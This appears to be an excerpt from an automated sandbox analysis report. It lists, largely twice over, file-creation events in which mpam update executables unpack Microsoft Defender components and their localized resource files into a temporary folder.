Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpAsDesc.dll.mui Jump to dropped file
